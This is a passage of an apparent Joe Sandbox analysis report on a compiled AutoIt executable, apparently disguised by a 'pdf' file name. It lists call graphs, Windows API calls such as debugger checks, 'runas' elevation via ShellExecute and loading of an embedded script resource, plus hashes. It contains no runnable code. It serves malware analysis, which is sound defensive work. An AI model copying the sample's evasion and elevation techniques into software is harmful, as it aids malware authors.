93319->93407 93321 3b4fb6 93323 344517 83 API calls 93322->93323 93324 38c405 93323->93324 93584 38c56d 93324->93584 93327 3444ed 64 API calls 93328 38c432 93327->93328 93329 3444ed 64 API calls 93328->93329 93330 38c442 93329->93330 93331 3444ed 64 API calls 93330->93331 93332 38c45d 93331->93332 93333 3444ed 64 API calls 93332->93333 93334 38c478 93333->93334 93335 344517 83 API calls 93334->93335 93336 38c48f 93335->93336 93337 36395c __malloc_crt 47 API calls 93336->93337 93338 38c496 93337->93338 93339 36395c __malloc_crt 47 API calls 93338->93339 93340 38c4a0 93339->93340 93341 3444ed 64 API calls 93340->93341 93342 38c4b4 93341->93342 93343 38bf5a GetSystemTimeAsFileTime 93342->93343 93344 38c4c7 93343->93344 93345 38c4dc 93344->93345 93346 38c4f1 93344->93346 93347 361c9d _free 47 API calls 93345->93347 93348 38c556 93346->93348 93349 38c4f7 93346->93349 93350 38c4e2 93347->93350 93352 361c9d _free 47 API calls 93348->93352 93590 38b965 118 API calls __fcloseall 93349->93590 93353 361c9d _free 47 API calls 93350->93353 93355 38c41b 93352->93355 93353->93355 93354 38c54e 93356 361c9d _free 47 API calls 93354->93356 93355->93228 93357 344252 93355->93357 93356->93355 93358 34425c 93357->93358 93360 344263 93357->93360 93591 3635e4 93358->93591 93361 344272 93360->93361 93362 344283 FreeLibrary 93360->93362 93361->93228 93362->93361 93412 344339 93363->93412 93366 34423c 93368 344244 FreeLibrary 93366->93368 93369 3441bb 93366->93369 93368->93369 93370 363499 93369->93370 93420 3634ae 93370->93420 93372 3441c8 93372->93303 93372->93304 93498 3442e4 93373->93498 93376 3442b8 93377 3442c1 FreeLibrary 93376->93377 93378 3441ec 93376->93378 93377->93378 93380 344380 93378->93380 93381 35f4ea 48 API calls 93380->93381 93382 344395 93381->93382 93383 3447b7 48 API calls 93382->93383 93384 3443a1 ___crtGetEnvironmentStringsW 93383->93384 93385 3443dc 93384->93385 93387 3444d1 93384->93387 93388 344499 93384->93388 93386 344950 57 API calls 93385->93386 93394 3443e5 
93386->93394 93517 38c750 93 API calls 93387->93517 93506 34406b CreateStreamOnHGlobal 93388->93506 93391 3444ed 64 API calls 93391->93394 93393 344479 93393->93312 93394->93391 93394->93393 93395 3b4ed7 93394->93395 93512 344517 93394->93512 93396 344517 83 API calls 93395->93396 93397 3b4eeb 93396->93397 93398 3444ed 64 API calls 93397->93398 93398->93393 93400 3b4fc0 93399->93400 93401 3444ff 93399->93401 93541 36381e 93401->93541 93404 38bf5a 93561 38bdb4 93404->93561 93406 38bf70 93406->93319 93408 3b5002 93407->93408 93409 34495f 93407->93409 93566 363e65 93409->93566 93411 344967 93411->93321 93416 34434b 93412->93416 93415 344321 LoadLibraryA GetProcAddress 93415->93366 93417 34422f 93416->93417 93418 344354 LoadLibraryA 93416->93418 93417->93366 93417->93415 93418->93417 93419 344365 GetProcAddress 93418->93419 93419->93417 93423 3634ba __fcloseall 93420->93423 93421 3634cd 93468 367c0e 47 API calls __getptd_noexit 93421->93468 93423->93421 93424 3634fe 93423->93424 93439 36e4c8 93424->93439 93425 3634d2 93469 366e10 8 API calls __Wcsftime_l 93425->93469 93428 363503 93429 36350c 93428->93429 93430 363519 93428->93430 93470 367c0e 47 API calls __getptd_noexit 93429->93470 93432 363543 93430->93432 93433 363523 93430->93433 93453 36e5e0 93432->93453 93471 367c0e 47 API calls __getptd_noexit 93433->93471 93434 3634dd __fcloseall @_EH4_CallFilterFunc@8 93434->93372 93440 36e4d4 __fcloseall 93439->93440 93441 367cf4 __lock 47 API calls 93440->93441 93451 36e4e2 93441->93451 93442 36e552 93473 36e5d7 93442->93473 93443 36e559 93444 3669d0 __malloc_crt 47 API calls 93443->93444 93446 36e560 93444->93446 93446->93442 93448 36e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93446->93448 93447 36e5cc __fcloseall 93447->93428 93448->93442 93449 367d7c __mtinitlocknum 47 API calls 93449->93451 93451->93442 93451->93443 93451->93449 93476 364e5b 48 API calls __lock 93451->93476 93477 364ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93451->93477 
93462 36e600 __wopenfile 93453->93462 93454 36e61a 93482 367c0e 47 API calls __getptd_noexit 93454->93482 93456 36e7d5 93456->93454 93460 36e838 93456->93460 93457 36e61f 93483 366e10 8 API calls __Wcsftime_l 93457->93483 93459 36354e 93472 363570 LeaveCriticalSection LeaveCriticalSection _fseek 93459->93472 93479 3763c9 93460->93479 93462->93454 93462->93456 93462->93462 93484 36185b 59 API calls 2 library calls 93462->93484 93464 36e7ce 93464->93456 93485 36185b 59 API calls 2 library calls 93464->93485 93466 36e7ed 93466->93456 93486 36185b 59 API calls 2 library calls 93466->93486 93468->93425 93469->93434 93470->93434 93471->93434 93472->93434 93478 367e58 LeaveCriticalSection 93473->93478 93475 36e5de 93475->93447 93476->93451 93477->93451 93478->93475 93487 375bb1 93479->93487 93481 3763e2 93481->93459 93482->93457 93483->93459 93484->93464 93485->93466 93486->93456 93489 375bbd __fcloseall 93487->93489 93488 375bcf 93490 367c0e __Wcsftime_l 47 API calls 93488->93490 93489->93488 93491 375c06 93489->93491 93492 375bd4 93490->93492 93494 375c78 __wsopen_helper 110 API calls 93491->93494 93493 366e10 __Wcsftime_l 8 API calls 93492->93493 93495 375bde __fcloseall 93493->93495 93496 375c23 93494->93496 93495->93481 93497 375c4c __wsopen_helper LeaveCriticalSection 93496->93497 93497->93495 93502 3442f6 93498->93502 93501 3442cc LoadLibraryA GetProcAddress 93501->93376 93503 3442aa 93502->93503 93504 3442ff LoadLibraryA 93502->93504 93503->93376 93503->93501 93504->93503 93505 344310 GetProcAddress 93504->93505 93505->93503 93507 344085 FindResourceExW 93506->93507 93511 3440a2 93506->93511 93508 3b4f16 LoadResource 93507->93508 93507->93511 93509 3b4f2b SizeofResource 93508->93509 93508->93511 93510 3b4f3f LockResource 93509->93510 93509->93511 93510->93511 93511->93385 93513 344526 93512->93513 93514 3b4fe0 93512->93514 93518 363a8d 93513->93518 93516 344534 93516->93394 93517->93385 93519 363a99 __fcloseall 93518->93519 93520 363aa7 93519->93520 93522 363acd 
93519->93522 93531 367c0e 47 API calls __getptd_noexit 93520->93531 93533 364e1c 93522->93533 93523 363aac 93532 366e10 8 API calls __Wcsftime_l 93523->93532 93526 363ad3 93539 3639fe 81 API calls 3 library calls 93526->93539 93528 363ae2 93540 363b04 LeaveCriticalSection LeaveCriticalSection _fseek 93528->93540 93530 363ab7 __fcloseall 93530->93516 93531->93523 93532->93530 93534 364e4e EnterCriticalSection 93533->93534 93535 364e2c 93533->93535 93536 364e44 93534->93536 93535->93534 93537 364e34 93535->93537 93536->93526 93538 367cf4 __lock 47 API calls 93537->93538 93538->93536 93539->93528 93540->93530 93544 363839 93541->93544 93543 344510 93543->93404 93545 363845 __fcloseall 93544->93545 93546 36385b _memset 93545->93546 93547 363888 93545->93547 93548 363880 __fcloseall 93545->93548 93557 367c0e 47 API calls __getptd_noexit 93546->93557 93549 364e1c __lock_file 48 API calls 93547->93549 93548->93543 93551 36388e 93549->93551 93559 36365b 62 API calls 6 library calls 93551->93559 93552 363875 93558 366e10 8 API calls __Wcsftime_l 93552->93558 93555 3638a4 93560 3638c2 LeaveCriticalSection LeaveCriticalSection _fseek 93555->93560 93557->93552 93558->93548 93559->93555 93560->93548 93564 36344a GetSystemTimeAsFileTime 93561->93564 93563 38bdc3 93563->93406 93565 363478 __aulldiv 93564->93565 93565->93563 93567 363e71 __fcloseall 93566->93567 93568 363e94 93567->93568 93569 363e7f 93567->93569 93571 364e1c __lock_file 48 API calls 93568->93571 93580 367c0e 47 API calls __getptd_noexit 93569->93580 93573 363e9a 93571->93573 93572 363e84 93581 366e10 8 API calls __Wcsftime_l 93572->93581 93582 363b0c 55 API calls 4 library calls 93573->93582 93576 363ea5 93583 363ec5 LeaveCriticalSection LeaveCriticalSection _fseek 93576->93583 93578 363eb7 93579 363e8f __fcloseall 93578->93579 93579->93411 93580->93572 93581->93579 93582->93576 93583->93578 93586 38c581 __tzset_nolock _wcscmp 93584->93586 93585 38bf5a GetSystemTimeAsFileTime 93585->93586 93586->93585 93587 
3444ed 64 API calls 93586->93587 93588 38c417 93586->93588 93589 344517 83 API calls 93586->93589 93587->93586 93588->93327 93588->93355 93589->93586 93590->93354 93592 3635f0 __fcloseall 93591->93592 93593 363604 93592->93593 93594 36361c 93592->93594 93620 367c0e 47 API calls __getptd_noexit 93593->93620 93596 364e1c __lock_file 48 API calls 93594->93596 93600 363614 __fcloseall 93594->93600 93598 36362e 93596->93598 93597 363609 93621 366e10 8 API calls __Wcsftime_l 93597->93621 93604 363578 93598->93604 93600->93360 93605 363587 93604->93605 93606 36359b 93604->93606 93663 367c0e 47 API calls __getptd_noexit 93605->93663 93608 363597 93606->93608 93623 362c84 93606->93623 93622 363653 LeaveCriticalSection LeaveCriticalSection _fseek 93608->93622 93609 36358c 93664 366e10 8 API calls __Wcsftime_l 93609->93664 93616 3635b5 93640 36e9d2 93616->93640 93618 3635bb 93618->93608 93619 361c9d _free 47 API calls 93618->93619 93619->93608 93620->93597 93621->93600 93622->93600 93624 362c97 93623->93624 93625 362cbb 93623->93625 93624->93625 93626 362933 __ftell_nolock 47 API calls 93624->93626 93629 36eb36 93625->93629 93627 362cb4 93626->93627 93665 36af61 93627->93665 93630 3635af 93629->93630 93631 36eb43 93629->93631 93633 362933 93630->93633 93631->93630 93632 361c9d _free 47 API calls 93631->93632 93632->93630 93634 362952 93633->93634 93635 36293d 93633->93635 93634->93616 93771 367c0e 47 API calls __getptd_noexit 93635->93771 93637 362942 93772 366e10 8 API calls __Wcsftime_l 93637->93772 93639 36294d 93639->93616 93641 36e9de __fcloseall 93640->93641 93642 36e9e6 93641->93642 93643 36e9fe 93641->93643 93788 367bda 47 API calls __getptd_noexit 93642->93788 93645 36ea7b 93643->93645 93650 36ea28 93643->93650 93792 367bda 47 API calls __getptd_noexit 93645->93792 93646 36e9eb 93789 367c0e 47 API calls __getptd_noexit 93646->93789 93649 36ea80 93793 367c0e 47 API calls __getptd_noexit 93649->93793 93652 36a8ed ___lock_fhandle 49 API calls 93650->93652 93653 36ea2e 
93652->93653 93655 36ea41 93653->93655 93656 36ea4c 93653->93656 93654 36ea88 93794 366e10 8 API calls __Wcsftime_l 93654->93794 93773 36ea9c 93655->93773 93790 367c0e 47 API calls __getptd_noexit 93656->93790 93659 36e9f3 __fcloseall 93659->93618 93661 36ea47 93791 36ea73 LeaveCriticalSection __unlock_fhandle 93661->93791 93663->93609 93664->93608 93666 36af6d __fcloseall 93665->93666 93667 36af75 93666->93667 93668 36af8d 93666->93668 93763 367bda 47 API calls __getptd_noexit 93667->93763 93669 36b022 93668->93669 93673 36afbf 93668->93673 93768 367bda 47 API calls __getptd_noexit 93669->93768 93672 36af7a 93764 367c0e 47 API calls __getptd_noexit 93672->93764 93690 36a8ed 93673->93690 93674 36b027 93769 367c0e 47 API calls __getptd_noexit 93674->93769 93678 36afc5 93680 36afeb 93678->93680 93681 36afd8 93678->93681 93679 36b02f 93770 366e10 8 API calls __Wcsftime_l 93679->93770 93765 367c0e 47 API calls __getptd_noexit 93680->93765 93699 36b043 93681->93699 93683 36af82 __fcloseall 93683->93625 93686 36afe4 93767 36b01a LeaveCriticalSection __unlock_fhandle 93686->93767 93687 36aff0 93766 367bda 47 API calls __getptd_noexit 93687->93766 93691 36a8f9 __fcloseall 93690->93691 93692 36a946 EnterCriticalSection 93691->93692 93693 367cf4 __lock 47 API calls 93691->93693 93694 36a96c __fcloseall 93692->93694 93695 36a91d 93693->93695 93694->93678 93696 36a93a 93695->93696 93697 36a928 InitializeCriticalSectionAndSpinCount 93695->93697 93698 36a970 ___lock_fhandle LeaveCriticalSection 93696->93698 93697->93696 93698->93692 93700 36b050 __ftell_nolock 93699->93700 93701 36b0ac 93700->93701 93702 36b08d 93700->93702 93730 36b082 93700->93730 93705 36b105 93701->93705 93706 36b0e9 93701->93706 93704 367bda __free_osfhnd 47 API calls 93702->93704 93703 36a70c __fltout2 6 API calls 93707 36b86b 93703->93707 93708 36b092 93704->93708 93709 36b11c 93705->93709 93712 36f82f __lseeki64_nolock 49 API calls 93705->93712 93711 367bda __free_osfhnd 47 API calls 93706->93711 
93707->93686 93710 367c0e __Wcsftime_l 47 API calls 93708->93710 93714 373bf2 __flswbuf 47 API calls 93709->93714 93713 36b099 93710->93713 93715 36b0ee 93711->93715 93712->93709 93716 366e10 __Wcsftime_l 8 API calls 93713->93716 93717 36b12a 93714->93717 93718 367c0e __Wcsftime_l 47 API calls 93715->93718 93716->93730 93719 36b44b 93717->93719 93725 367a0d __beginthread 47 API calls 93717->93725 93720 36b0f5 93718->93720 93721 36b463 93719->93721 93722 36b7b8 WriteFile 93719->93722 93723 366e10 __Wcsftime_l 8 API calls 93720->93723 93726 36b55a 93721->93726 93734 36b479 93721->93734 93724 36b7e1 GetLastError 93722->93724 93732 36b410 93722->93732 93723->93730 93724->93732 93727 36b150 GetConsoleMode 93725->93727 93737 36b663 93726->93737 93740 36b565 93726->93740 93727->93719 93729 36b189 93727->93729 93728 36b81b 93728->93730 93731 367c0e __Wcsftime_l 47 API calls 93728->93731 93729->93719 93733 36b199 GetConsoleCP 93729->93733 93730->93703 93738 36b843 93731->93738 93732->93728 93732->93730 93739 36b7f7 93732->93739 93733->93732 93750 36b1c2 93733->93750 93734->93728 93735 36b4e9 WriteFile 93734->93735 93735->93724 93736 36b526 93735->93736 93736->93732 93736->93734 93758 36b555 93736->93758 93737->93728 93741 36b6d8 WideCharToMultiByte 93737->93741 93742 367bda __free_osfhnd 47 API calls 93738->93742 93743 36b812 93739->93743 93744 36b7fe 93739->93744 93740->93728 93745 36b5de WriteFile 93740->93745 93741->93724 93746 36b71f 93741->93746 93742->93730 93748 367bed __dosmaperr 47 API calls 93743->93748 93747 367c0e __Wcsftime_l 47 API calls 93744->93747 93745->93724 93749 36b62d 93745->93749 93746->93732 93746->93737 93751 36b727 WriteFile 93746->93751 93746->93758 93752 36b803 93747->93752 93748->93730 93749->93732 93749->93740 93749->93758 93750->93732 93753 361688 __chsize_nolock 57 API calls 93750->93753 93756 3740f7 59 API calls __chsize_nolock 93750->93756 93759 36b28f WideCharToMultiByte 93750->93759 93761 36b2f6 93750->93761 93751->93746 93754 36b77a 

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8e52ea1aa68eb90e45f6a120975d330f3c4b46abaf46f4480efc5f93239478fd
                                                    • Instruction ID: 7058acf73c370e7cb4c884c53df2a085a6a8dd4002b07d1ba3299e69b5699435
                                                    • Opcode Fuzzy Hash: 8e52ea1aa68eb90e45f6a120975d330f3c4b46abaf46f4480efc5f93239478fd
                                                    • Instruction Fuzzy Hash: 63324D75A022688FCB268F15DC41AE9B7B5FF46310F5980D9E40AE7A89D7309EC1CF52

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00343AA3,?), ref: 00343D45
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00343AA3,?), ref: 00343D57
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00401148,00401130,?,?,?,?,00343AA3,?), ref: 00343DC8
                                                      • Part of subcall function 00346430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00343DEE,00401148,?,?,?,?,?,00343AA3,?), ref: 00346471
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00343AA3,?), ref: 00343E48
                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003F28F4,00000010), ref: 003B1CCE
                                                    • SetCurrentDirectoryW.KERNEL32(?,00401148,?,?,?,?,?,00343AA3,?), ref: 003B1D06
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003DDAB4,00401148,?,?,?,?,?,00343AA3,?), ref: 003B1D89
                                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00343AA3), ref: 003B1D90
                                                      • Part of subcall function 00343E6E: GetSysColorBrush.USER32(0000000F), ref: 00343E79
                                                      • Part of subcall function 00343E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00343E88
                                                      • Part of subcall function 00343E6E: LoadIconW.USER32(00000063), ref: 00343E9E
                                                      • Part of subcall function 00343E6E: LoadIconW.USER32(000000A4), ref: 00343EB0
                                                      • Part of subcall function 00343E6E: LoadIconW.USER32(000000A2), ref: 00343EC2
                                                      • Part of subcall function 00343E6E: RegisterClassExW.USER32(?), ref: 00343F30
                                                      • Part of subcall function 003436B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003436E6
                                                      • Part of subcall function 003436B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343707
                                                      • Part of subcall function 003436B8: ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 0034371B
                                                      • Part of subcall function 003436B8: ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 00343724
                                                      • Part of subcall function 00344FFC: _memset.LIBCMT ref: 00345022
                                                      • Part of subcall function 00344FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003450CB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                    • String ID: ()?$This is a third-party compiled AutoIt script.$runas
                                                    • API String ID: 438480954-42928549
                                                    • Opcode ID: 4cfb9040dea44fed68998dc012de7982a4cdaaeaf8c50d4be9533d721bb4d8aa
                                                    • Instruction ID: 13565b8e901344168d4240a5c36d0658e42d12ecdd50616a7a94616abd09a188
                                                    • Opcode Fuzzy Hash: 4cfb9040dea44fed68998dc012de7982a4cdaaeaf8c50d4be9533d721bb4d8aa
                                                    • Instruction Fuzzy Hash: AF510731E05248ABCF17ABB0DD46EEE7BB99B19704F004079F641BF1A2DB746645CB21

                                                    Control-flow Graph

                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 0035DDEC
                                                    • GetCurrentProcess.KERNEL32(00000000,003DDC38,?,?), ref: 0035DEAC
                                                    • GetNativeSystemInfo.KERNELBASE(?,003DDC38,?,?), ref: 0035DF01
                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0035DF0C
                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0035DF1F
                                                    • GetSystemInfo.KERNEL32(?,003DDC38,?,?), ref: 0035DF29
                                                    • GetSystemInfo.KERNEL32(?,003DDC38,?,?), ref: 0035DF35
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                    • String ID:
                                                    • API String ID: 3851250370-0
                                                    • Opcode ID: ed6fbfbd8654564cf8da3eaf73ba653c54fa7b0de363f5cbdcdcafd465e0659a
                                                    • Instruction ID: f2624dbde9988210c1dd79d7016d1dac2557d89ea481b78f351486bebbf2be66
                                                    • Opcode Fuzzy Hash: ed6fbfbd8654564cf8da3eaf73ba653c54fa7b0de363f5cbdcdcafd465e0659a
                                                    • Instruction Fuzzy Hash: 6B61A0B180A284CFCF27CF6898C19EA7FB46F29305B1A49D9DC859F217C624C90DCB65

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0034449E,?,?,00000000,00000001), ref: 0034407B
                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0034449E,?,?,00000000,00000001), ref: 00344092
                                                    • LoadResource.KERNEL32(?,00000000,?,?,0034449E,?,?,00000000,00000001,?,?,?,?,?,?,003441FB), ref: 003B4F1A
                                                    • SizeofResource.KERNEL32(?,00000000,?,?,0034449E,?,?,00000000,00000001,?,?,?,?,?,?,003441FB), ref: 003B4F2F
                                                    • LockResource.KERNEL32(0034449E,?,?,0034449E,?,?,00000000,00000001,?,?,?,?,?,?,003441FB,00000000), ref: 003B4F42
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                    • String ID: SCRIPT
                                                    • API String ID: 3051347437-3967369404
                                                    • Opcode ID: c96f3d149815d1a324307c6233897d83f3ff07120dca6bae9500d8d160c53dde
                                                    • Instruction ID: 724adccd68be27bebed513be57a35fd7f9b41c26b0e95862bd61b4e3ff49b0b7
                                                    • Opcode Fuzzy Hash: c96f3d149815d1a324307c6233897d83f3ff07120dca6bae9500d8d160c53dde
                                                    • Instruction Fuzzy Hash: B3112A71200705AFE7228B65EC49F67BBBDEBC5B51F10457CF602DA6A0DA71EC048B20
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,003B2F49), ref: 00386CB9
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00386CCA
                                                    • FindClose.KERNEL32(00000000), ref: 00386CDA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: d4a519f614bc8e0ddaa1678bed05cf9fbd88dbb23ec094bd703638a3634967ac
                                                    • Instruction ID: aafa502b2109a5d59645119d7fdf880d607e86928ce1af0a3f3e277ca399108c
                                                    • Opcode Fuzzy Hash: d4a519f614bc8e0ddaa1678bed05cf9fbd88dbb23ec094bd703638a3634967ac
                                                    • Instruction Fuzzy Hash: EAE048318145155B86517738EC0E8E9777CDA05339F144765F575C11D0E770E94447D5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: @
                                                    • API String ID: 3964851224-124383662
                                                    • Opcode ID: fe58fc7fb7d8aef3e92210c8fdc38538f3fe6eeb05234591f73151781e50aa3d
                                                    • Instruction ID: 559e33b1706b99c9592b70b5e1a2d8a328ce2dfc568b5e0e849286706b22eda1
                                                    • Opcode Fuzzy Hash: fe58fc7fb7d8aef3e92210c8fdc38538f3fe6eeb05234591f73151781e50aa3d
                                                    • Instruction Fuzzy Hash: 8F929B706083418FD726DF18C480F6AB7E5BF88348F15885DE98A8B762D771ED49CB92
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9f759f50ae367f297d018cdb103424440ec70d714f00c943d9bfe628b77e26c1
                                                    • Instruction ID: 48593709e9577025b9d62eea83fb14d3c8e1b6b014ab300aca58f044904e782b
                                                    • Opcode Fuzzy Hash: 9f759f50ae367f297d018cdb103424440ec70d714f00c943d9bfe628b77e26c1
                                                    • Instruction Fuzzy Hash: 5312BD70904206CFDB26DF58C480AAAB7F0FF58314F168069E98AAF751E735BD85CB91
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0034E959
                                                    • timeGetTime.WINMM ref: 0034EBFA
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0034ED2E
                                                    • TranslateMessage.USER32(?), ref: 0034ED3F
                                                    • DispatchMessageW.USER32(?), ref: 0034ED4A
                                                    • LockWindowUpdate.USER32(00000000), ref: 0034ED79
                                                    • DestroyWindow.USER32 ref: 0034ED85
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0034ED9F
                                                    • Sleep.KERNEL32(0000000A), ref: 003B5270
                                                    • TranslateMessage.USER32(?), ref: 003B59F7
                                                    • DispatchMessageW.USER32(?), ref: 003B5A05
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003B5A19
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
